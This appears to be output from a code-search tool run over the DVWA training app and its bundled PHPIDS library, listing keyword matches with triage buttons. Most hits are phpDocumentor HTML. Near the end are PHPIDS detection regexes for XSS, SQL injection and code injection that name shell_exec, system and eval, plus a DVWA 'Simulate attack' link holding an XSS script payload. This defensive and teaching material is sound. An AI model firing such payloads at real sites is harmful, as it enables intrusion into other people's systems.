141-<p class="short-description">Constructor</p>
142-	<ul class="tags">
143-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Session.html:165 (205/257) OK | Dubious | Bad | Hide
162-		
163-			
164-	</div>
165:<a name="methodgetCache" id="getCache"><!-- --></a>
166-<div class="oddrow">
167-	
168-	<div class="method-header">
169-		<span class="method-title">getCache</span> (line <span class="line-number">129</span>)
170-	</div> 
171-	
172:	<!-- ========== Info from phpDoc block ========= -->
173-<p class="short-description">Returns the cached data</p>
174-<p class="description"><p>Note that this method returns false if either type or file cache is not set</p></p>
175-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Session.html:197 (206/257) OK | Dubious | Bad | Hide
194-					</dl>
195-			
196-	</div>
197:<a name="methodsetCache" id="setCache"><!-- --></a>
198-<div class="evenrow">
199-	
200-	<div class="method-header">
201-		<span class="method-title">setCache</span> (line <span class="line-number">115</span>)
202-	</div> 
203-	
204:	<!-- ========== Info from phpDoc block ========= -->
205-<p class="short-description">Writes cache data into the session</p>
206-	<ul class="tags">
207-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter.html:5 (207/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Filter</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter.html:24 (208/257) OK | Dubious | Bad | Hide
21-						
22-					</div>
23-	<div class="info-box-body">
24:        		<!-- ========== Info from phpDoc block ========= -->
25-<p class="short-description">PHPIDS Filter object</p>
26-<p class="description"><p>Each object of this class serves as a container for a specific filter. The  object provides methods to get information about this particular filter and  also to match an arbitrary string against it.</p></p>
27-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter.html:146 (209/257) OK | Dubious | Bad | Hide
143-							
144-					</div>
145-		<div class="info-box-body">
146:			<a name="var$description" id="$description"><!-- --></A>
147-<div class="oddrow">
148-
149-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter.html:157 (210/257) OK | Dubious | Bad | Hide
154-		</span>
155-	</div>
156-
157:	<!-- ========== Info from phpDoc block ========= -->
158-<p class="short-description">Filter description</p>
159-	<ul class="tags">
160-				<li><span class="field">access:</span> protected</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter.html:168 (211/257) OK | Dubious | Bad | Hide
165-		
166-
167-</div>
168:<a name="var$impact" id="$impact"><!-- --></A>
169-<div class="evenrow">
170-
171-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter.html:179 (212/257) OK | Dubious | Bad | Hide
176-		</span>
177-	</div>
178-
179:	<!-- ========== Info from phpDoc block ========= -->
180-<p class="short-description">Filter impact level</p>
181-	<ul class="tags">
182-				<li><span class="field">access:</span> protected</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter.html:190 (213/257) OK | Dubious | Bad | Hide
187-		
188-
189-</div>
190:<a name="var$rule" id="$rule"><!-- --></A>
191-<div class="oddrow">
192-
193-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter.html:201 (214/257) OK | Dubious | Bad | Hide
198-		</span>
199-	</div>
200-
201:	<!-- ========== Info from phpDoc block ========= -->
202-<p class="short-description">Filter rule</p>
203-	<ul class="tags">
204-				<li><span class="field">access:</span> protected</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter.html:212 (215/257) OK | Dubious | Bad | Hide
209-		
210-
211-</div>
212:<a name="var$tags" id="$tags"><!-- --></A>
213-<div class="evenrow">
214-
215-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter.html:223 (216/257) OK | Dubious | Bad | Hide
220-		</span>
221-	</div>
222-
223:	<!-- ========== Info from phpDoc block ========= -->
224-<p class="short-description">List of tags of the filter</p>
225-	<ul class="tags">
226-				<li><span class="field">access:</span> protected</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter.html:250 (217/257) OK | Dubious | Bad | Hide
247-		<div class="info-box-body">
248-			<A NAME='method_detail'></A>
249-
250:<a name="method__construct" id="__construct"><!-- --></a>
251-<div class="oddrow">
252-	
253-	<div class="method-header">
254-		<span class="method-title">Constructor __construct</span> (line <span class="line-number">93</span>)
255-	</div> 
256-	
257:	<!-- ========== Info from phpDoc block ========= -->
258-<p class="short-description">Constructor</p>
259-	<ul class="tags">
260-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter.html:291 (218/257) OK | Dubious | Bad | Hide
288-		
289-			
290-	</div>
291:<a name="methodgetDescription" id="getDescription"><!-- --></a>
292-<div class="evenrow">
293-	
294-	<div class="method-header">
295-		<span class="method-title">getDescription</span> (line <span class="line-number">131</span>)
296-	</div> 
297-	
298:	<!-- ========== Info from phpDoc block ========= -->
299-<p class="short-description">Returns filter description</p>
300-	<ul class="tags">
301-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter.html:315 (219/257) OK | Dubious | Bad | Hide
312-		
313-			
314-	</div>
315:<a name="methodgetId" id="getId"><!-- --></a>
316-<div class="oddrow">
317-	
318-	<div class="method-header">
319-		<span class="method-title">getId</span> (line <span class="line-number">174</span>)
320-	</div> 
321-	
322:	<!-- ========== Info from phpDoc block ========= -->
323-<p class="short-description">Get filter ID</p>
324-	<ul class="tags">
325-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter.html:339 (220/257) OK | Dubious | Bad | Hide
336-		
337-			
338-	</div>
339:<a name="methodgetImpact" id="getImpact"><!-- --></a>
340-<div class="evenrow">
341-	
342-	<div class="method-header">
343-		<span class="method-title">getImpact</span> (line <span class="line-number">164</span>)
344-	</div> 
345-	
346:	<!-- ========== Info from phpDoc block ========= -->
347-<p class="short-description">Get filter impact level</p>
348-	<ul class="tags">
349-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter.html:363 (221/257) OK | Dubious | Bad | Hide
360-		
361-			
362-	</div>
363:<a name="methodgetRule" id="getRule"><!-- --></a>
364-<div class="oddrow">
365-	
366-	<div class="method-header">
367-		<span class="method-title">getRule</span> (line <span class="line-number">154</span>)
368-	</div> 
369-	
370:	<!-- ========== Info from phpDoc block ========= -->
371-<p class="short-description">Returns filter rule</p>
372-	<ul class="tags">
373-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter.html:387 (222/257) OK | Dubious | Bad | Hide
384-		
385-			
386-	</div>
387:<a name="methodgetTags" id="getTags"><!-- --></a>
388-<div class="evenrow">
389-	
390-	<div class="method-header">
391-		<span class="method-title">getTags</span> (line <span class="line-number">144</span>)
392-	</div> 
393-	
394:	<!-- ========== Info from phpDoc block ========= -->
395-<p class="short-description">Return list of affected tags</p>
396-<p class="description"><p>Each filter rule is concerned with a certain kind of attack vectors.  This method returns those affected kinds.</p></p>
397-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter.html:412 (223/257) OK | Dubious | Bad | Hide
409-		
410-			
411-	</div>
412:<a name="methodmatch" id="match"><!-- --></a>
413-<div class="oddrow">
414-	
415-	<div class="method-header">
416-		<span class="method-title">match</span> (line <span class="line-number">113</span>)
417-	</div> 
418-	
419:	<!-- ========== Info from phpDoc block ========= -->
420-<p class="short-description">Matches a string against current filter</p>
421-<p class="description"><p>Matches given string against the filter rule the specific object of this  class represents</p></p>
422-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Composite.html:5 (224/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Log_Composite</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Composite.html:24 (225/257) OK | Dubious | Bad | Hide
21-						
22-					</div>
23-	<div class="info-box-body">
24:        		<!-- ========== Info from phpDoc block ========= -->
25-<p class="short-description">Log Composite</p>
26-<p class="description"><p>This class implements the composite pattern to allow to work with multiple  logging wrappers at once.</p></p>
27-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Composite.html:113 (226/257) OK | Dubious | Bad | Hide
110-							
111-					</div>
112-		<div class="info-box-body">
113:			<a name="var$loggers" id="$loggers"><!-- --></A>
114-<div class="evenrow">
115-
116-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Composite.html:124 (227/257) OK | Dubious | Bad | Hide
121-		</span>
122-	</div>
123-
124:	<!-- ========== Info from phpDoc block ========= -->
125-<p class="short-description">Holds registered logging wrapper</p>
126-	<ul class="tags">
127-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Composite.html:151 (228/257) OK | Dubious | Bad | Hide
148-		<div class="info-box-body">
149-			<A NAME='method_detail'></A>
150-
151:<a name="methodaddLogger" id="addLogger"><!-- --></a>
152-<div class="oddrow">
153-	
154-	<div class="method-header">
155-		<span class="method-title">addLogger</span> (line <span class="line-number">84</span>)
156-	</div> 
157-	
158:	<!-- ========== Info from phpDoc block ========= -->
159-<p class="short-description">Registers a new logging wrapper</p>
160-<p class="description"><p>Only valid IDS_Log_Interface instances passed to this function will be  registered</p></p>
161-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Composite.html:176 (229/257) OK | Dubious | Bad | Hide
173-		
174-			
175-	</div>
176:<a name="methodexecute" id="execute"><!-- --></a>
177-<div class="evenrow">
178-	
179-	<div class="method-header">
180-		<span class="method-title">execute</span> (line <span class="line-number">69</span>)
181-	</div> 
182-	
183:	<!-- ========== Info from phpDoc block ========= -->
184-<p class="short-description">Iterates through registered loggers and executes them</p>
185-	<ul class="tags">
186-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Composite.html:205 (230/257) OK | Dubious | Bad | Hide
202-		
203-			
204-	</div>
205:<a name="methodremoveLogger" id="removeLogger"><!-- --></a>
206-<div class="oddrow">
207-	
208-	<div class="method-header">
209-		<span class="method-title">removeLogger</span> (line <span class="line-number">104</span>)
210-	</div> 
211-	
212:	<!-- ========== Info from phpDoc block ========= -->
213-<p class="short-description">Removes a logger</p>
214-	<ul class="tags">
215-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Interface.html:5 (231/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Log_Interface</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Interface.html:23 (232/257) OK | Dubious | Bad | Hide
20-						
21-					</div>
22-	<div class="info-box-body">
23:        		<!-- ========== Info from phpDoc block ========= -->
24-<p class="short-description">Interface for logging wrappers</p>
25-	<ul class="tags">
26-				<li><span class="field">author:</span> Lars Strojny &lt;<a href="mailto:lars@strojny.net">lars@strojny.net</a>&gt;</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Interface.html:78 (233/257) OK | Dubious | Bad | Hide
75-		<div class="info-box-body">
76-			<A NAME='method_detail'></A>
77-
78:<a name="methodexecute" id="execute"><!-- --></a>
79-<div class="evenrow">
80-	
81-	<div class="method-header">
82-		<span class="method-title">execute</span> (line <span class="line-number">56</span>)
83-	</div> 
84-	
85:	<!-- ========== Info from phpDoc block ========= -->
86-<p class="short-description">Interface method</p>
87-	<ul class="tags">
88-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Event.php.html:5 (234/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page Event.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Event.php.html:22 (235/257) OK | Dubious | Bad | Hide
19-							<a href="#sec-classes">Classes</a>
20-														</div>
21-	<div class="info-box-body">	
22:		<!-- ========== Info from phpDoc block ========= -->
23-<p class="short-description">PHPIDS</p>
24-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
25-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:5 (236/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Converter</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:23 (237/257) OK | Dubious | Bad | Hide
20-						
21-					</div>
22-	<div class="info-box-body">
23:        		<!-- ========== Info from phpDoc block ========= -->
24-<p class="short-description">PHPIDS specific utility class to convert charsets manually</p>
25-<p class="description"><p>Note that if you make use of IDS_Converter::runAll(), existing class  methods will be executed in the same order as they are implemented in the  class tree!</p></p>
26-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:163 (238/257) OK | Dubious | Bad | Hide
160-		</div>
161-		<div class="info-box-body">
162-			<A NAME='method_detail'></A>
163:<a name="methodconvertConcatenations" id="convertConcatenations"><!-- --></a>
164-<div class="evenrow">
165-	
166-	<div class="method-header">
167-		<span class="method-title">static method convertConcatenations</span> (line <span class="line-number">506</span>)
168-	</div> 
169-	
170:	<!-- ========== Info from phpDoc block ========= -->
171-<p class="short-description">Converts basic concatenations</p>
172-	<ul class="tags">
173-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:193 (239/257) OK | Dubious | Bad | Hide
190-		
191-			
192-	</div>
193:<a name="methodconvertEntities" id="convertEntities"><!-- --></a>
194-<div class="oddrow">
195-	
196-	<div class="method-header">
197-		<span class="method-title">static method convertEntities</span> (line <span class="line-number">229</span>)
198-	</div> 
199-	
200:	<!-- ========== Info from phpDoc block ========= -->
201-<p class="short-description">Converts from hex/dec entities</p>
202-	<ul class="tags">
203-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:223 (240/257) OK | Dubious | Bad | Hide
220-		
221-			
222-	</div>
223:<a name="methodconvertFromCommented" id="convertFromCommented"><!-- --></a>
224-<div class="evenrow">
225-	
226-	<div class="method-header">
227-		<span class="method-title">static method convertFromCommented</span> (line <span class="line-number">86</span>)
228-	</div> 
229-	
230:	<!-- ========== Info from phpDoc block ========= -->
231-<p class="short-description">Check for comments and erases them if available</p>
232-	<ul class="tags">
233-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:253 (241/257) OK | Dubious | Bad | Hide
250-		
251-			
252-	</div>
253:<a name="methodconvertFromControlChars" id="convertFromControlChars"><!-- --></a>
254-<div class="oddrow">
255-	
256-	<div class="method-header">
257-		<span class="method-title">static method convertFromControlChars</span> (line <span class="line-number">321</span>)
258-	</div> 
259-	
260:	<!-- ========== Info from phpDoc block ========= -->
261-<p class="short-description">Detects nullbytes and controls chars via ord()</p>
262-	<ul class="tags">
263-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:283 (242/257) OK | Dubious | Bad | Hide
280-		
281-			
282-	</div>
283:<a name="methodconvertFromJSCharcode" id="convertFromJSCharcode"><!-- --></a>
284-<div class="evenrow">
285-	
286-	<div class="method-header">
287-		<span class="method-title">static method convertFromJSCharcode</span> (line <span class="line-number">134</span>)
288-	</div> 
289-	
290:	<!-- ========== Info from phpDoc block ========= -->
291-<p class="short-description">Checks for common charcode pattern and decodes them</p>
292-	<ul class="tags">
293-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:313 (243/257) OK | Dubious | Bad | Hide
310-		
311-			
312-	</div>
313:<a name="methodconvertFromJSUnicode" id="convertFromJSUnicode"><!-- --></a>
314-<div class="oddrow">
315-	
316-	<div class="method-header">
317-		<span class="method-title">static method convertFromJSUnicode</span> (line <span class="line-number">422</span>)
318-	</div> 
319-	
320:	<!-- ========== Info from phpDoc block ========= -->
321-<p class="short-description">This method converts JS unicode code points to  regular characters</p>
322-	<ul class="tags">
323-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:343 (244/257) OK | Dubious | Bad | Hide
340-		
341-			
342-	</div>
343:<a name="methodconvertFromNestedBase64" id="convertFromNestedBase64"><!-- --></a>
344-<div class="evenrow">
345-	
346-	<div class="method-header">
347-		<span class="method-title">static method convertFromNestedBase64</span> (line <span class="line-number">359</span>)
348-	</div> 
349-	
350:	<!-- ========== Info from phpDoc block ========= -->
351-<p class="short-description">This method matches and translates base64 strings and fragments  used in data URIs</p>
352-	<ul class="tags">
353-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:373 (245/257) OK | Dubious | Bad | Hide
370-		
371-			
372-	</div>
373:<a name="methodconvertFromNewLines" id="convertFromNewLines"><!-- --></a>
374-<div class="oddrow">
375-	
376-	<div class="method-header">
377-		<span class="method-title">static method convertFromNewLines</span> (line <span class="line-number">116</span>)
378-	</div> 
379-	
380:	<!-- ========== Info from phpDoc block ========= -->
381-<p class="short-description">Strip newlines</p>
382-	<ul class="tags">
383-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:403 (246/257) OK | Dubious | Bad | Hide
400-		
401-			
402-	</div>
403:<a name="methodconvertFromOutOfRangeChars" id="convertFromOutOfRangeChars"><!-- --></a>
404-<div class="evenrow">
405-	
406-	<div class="method-header">
407-		<span class="method-title">static method convertFromOutOfRangeChars</span> (line <span class="line-number">383</span>)
408-	</div> 
409-	
410:	<!-- ========== Info from phpDoc block ========= -->
411-<p class="short-description">Detects nullbytes and controls chars via ord()</p>
412-	<ul class="tags">
413-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:433 (247/257) OK | Dubious | Bad | Hide
430-		
431-			
432-	</div>
433:<a name="methodconvertFromProprietaryEncodings" id="convertFromProprietaryEncodings"><!-- --></a>
434-<div class="oddrow">
435-	
436-	<div class="method-header">
437-		<span class="method-title">static method convertFromProprietaryEncodings</span> (line <span class="line-number">558</span>)
438-	</div> 
439-	
440:	<!-- ========== Info from phpDoc block ========= -->
441-<p class="short-description">This method collects and decodes proprietary encoding types</p>
442-	<ul class="tags">
443-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:466 (248/257) OK | Dubious | Bad | Hide
463-		
464-			
465-	</div>
466:<a name="methodconvertFromSQLHex" id="convertFromSQLHex"><!-- --></a>
467-<div class="evenrow">
468-	
469-	<div class="method-header">
470-		<span class="method-title">static method convertFromSQLHex</span> (line <span class="line-number">266</span>)
471-	</div> 
472-	
473:	<!-- ========== Info from phpDoc block ========= -->
474-<p class="short-description">Converts SQLHEX to plain text</p>
475-	<ul class="tags">
476-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:496 (249/257) OK | Dubious | Bad | Hide
493-		
494-			
495-	</div>
496:<a name="methodconvertFromSQLKeywords" id="convertFromSQLKeywords"><!-- --></a>
497-<div class="oddrow">
498-	
499-	<div class="method-header">
500-		<span class="method-title">static method convertFromSQLKeywords</span> (line <span class="line-number">291</span>)
501-	</div> 
502-	
503:	<!-- ========== Info from phpDoc block ========= -->
504-<p class="short-description">Converts basic SQL keywords and obfuscations</p>
505-	<ul class="tags">
506-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:526 (250/257) OK | Dubious | Bad | Hide
523-		
524-			
525-	</div>
526:<a name="methodconvertFromUTF7" id="convertFromUTF7"><!-- --></a>
527-<div class="evenrow">
528-	
529-	<div class="method-header">
530-		<span class="method-title">static method convertFromUTF7</span> (line <span class="line-number">449</span>)
531-	</div> 
532-	
533:	<!-- ========== Info from phpDoc block ========= -->
534-<p class="short-description">Converts relevant UTF-7 tags to UTF-8</p>
535-	<ul class="tags">
536-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:556 (251/257) OK | Dubious | Bad | Hide
553-		
554-			
555-	</div>
556:<a name="methodconvertFromXML" id="convertFromXML"><!-- --></a>
557-<div class="oddrow">
558-	
559-	<div class="method-header">
560-		<span class="method-title">static method convertFromXML</span> (line <span class="line-number">403</span>)
561-	</div> 
562-	
563:	<!-- ========== Info from phpDoc block ========= -->
564-<p class="short-description">Strip XML patterns</p>
565-	<ul class="tags">
566-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:586 (252/257) OK | Dubious | Bad | Hide
583-		
584-			
585-	</div>
586:<a name="methodconvertJSRegexModifiers" id="convertJSRegexModifiers"><!-- --></a>
587-<div class="evenrow">
588-	
589-	<div class="method-header">
590-		<span class="method-title">static method convertJSRegexModifiers</span> (line <span class="line-number">214</span>)
591-	</div> 
592-	
593:	<!-- ========== Info from phpDoc block ========= -->
594-<p class="short-description">Eliminate JS regex modifiers</p>
595-	<ul class="tags">
596-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:616 (253/257) OK | Dubious | Bad | Hide
613-		
614-			
615-	</div>
616:<a name="methodconvertQuotes" id="convertQuotes"><!-- --></a>
617-<div class="oddrow">
618-	
619-	<div class="method-header">
620-		<span class="method-title">static method convertQuotes</span> (line <span class="line-number">249</span>)
621-	</div> 
622-	
623:	<!-- ========== Info from phpDoc block ========= -->
624-<p class="short-description">Normalize quotes</p>
625-	<ul class="tags">
626-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:646 (254/257) OK | Dubious | Bad | Hide
643-		
644-			
645-	</div>
646:<a name="methodrunAll" id="runAll"><!-- --></a>
647-<div class="evenrow">
648-	
649-	<div class="method-header">
650-		<span class="method-title">static method runAll</span> (line <span class="line-number">65</span>)
651-	</div> 
652-	
653:	<!-- ========== Info from phpDoc block ========= -->
654-<p class="short-description">Runs all converter functions</p>
655-<p class="description"><p>Note that if you make use of IDS_Converter::runAll(), existing class  methods will be executed in the same order as they are implemented in the  class tree!</p></p>
656-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:677 (255/257) OK | Dubious | Bad | Hide
674-		
675-			
676-	</div>
677:<a name="methodrunCentrifuge" id="runCentrifuge"><!-- --></a>
678-<div class="oddrow">
679-	
680-	<div class="method-header">
681-		<span class="method-title">static method runCentrifuge</span> (line <span class="line-number">603</span>)
682-	</div> 
683-	
684:	<!-- ========== Info from phpDoc block ========= -->
685-<p class="short-description">This method is the centrifuge prototype</p>
686-	<ul class="tags">
687-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Filter---Storage.php.html:5 (256/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page Storage.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Filter---Storage.php.html:22 (257/257) OK | Dubious | Bad | Hide
19-							<a href="#sec-classes">Classes</a>
20-														</div>
21-	<div class="info-box-body">	
22:		<!-- ========== Info from phpDoc block ========= -->
23-<p class="short-description">PHPIDS</p>
24-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
25-	<ul class="tags">

java

execute (3) Top | Hide

./external/phpids/0.6/lib/IDS/default_filter.xml:171 (1/3) OK | Dubious | Bad | Hide
169-    <filter>
170-        <id>16</id>
171:        <rule><![CDATA[([^*\s\w,.\/?+-]\s*)?(?<![a-mo-z]\s)(?<![a-z\/_@>\-\|])(\s*return\s*)?(?:alert|showmodaldialog|infinity|isnan|isnull|msgbox|expression|prompt|write(?:ln)?|confirm|dialog|urn|(?:un)?eval|exec|execscript|tostring|status|execute|window|unescape|navigate)(?(1)[^\w%"]|(?:\s*[^@\s\w%",.:\/+\-]))]]></rule>
172-        <description>Detects possible includes and typical script methods</description>
173-        <tags>
174-            <tag>xss</tag>
./external/phpids/0.6/lib/IDS/default_filter.xml:606 (2/3) OK | Dubious | Bad | Hide
603-    </filter>
604-    <filter>
605-        <id>56</id>
606:        <rule><![CDATA[(?:merge.*using\s*\()|(execute\s*immediate\s*")|(?:\W+\d*\s+having\s+\d)|(?:match\s*[\w(),+-]+\s*against\s*\()]]></rule>
607-        <description>Detects MATCH AGAINST, MERGE, EXECUTE IMMEDIATE and HAVING injections</description>
608-        <tags>
609-            <tag>sqli</tag>
./external/phpids/0.6/lib/IDS/default_filter.xml:637 (3/3) OK | Dubious | Bad | Hide
634-    </filter>   
635-    <filter>
636-        <id>59</id>
637:        <rule><![CDATA[(?:(?:[;]+|(<[?%](?:php)?)).*(?:define|eval|file_get_contents|include|require|require_once|set|shell_exec|phpinfo|system|passthru|preg_\w+|execute)\s*["(@])]]></rule>
638-        <description>Detects code injection attempts 2/3</description>
639-        <tags>
640-            <tag>id</tag>

js

eval (1) Top | Hide

./dvwa/js/dvwaPage.js:6 (1/1) OK | Dubious | Bad | Hide
4-	day = new Date();
5-	id = day.getTime();
6:	eval("page" + id + " = window.open(URL, '" + id + "', 'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=500,height=300,left = 540,top = 250');");
7-}
8-
9-/* Form validation */

php

eval( (11) Top | Hide

./security.php:96 (1/11) OK | Dubious | Bad | Hide
94-
95-	<p>{$phpIdsHtml}</p>
96:	[<a href=\"?test=%22><script>eval(window.name)</script>\">Simulate attack</a>] -
97-	[<a href=\"ids_log.php\">View IDS log</a>]
98-	
99-</div>
./external/phpids/0.6/docs/examples/example.php:113 (2/11) OK | Dubious | Bad | Hide
110-        
111-
112-    } else {
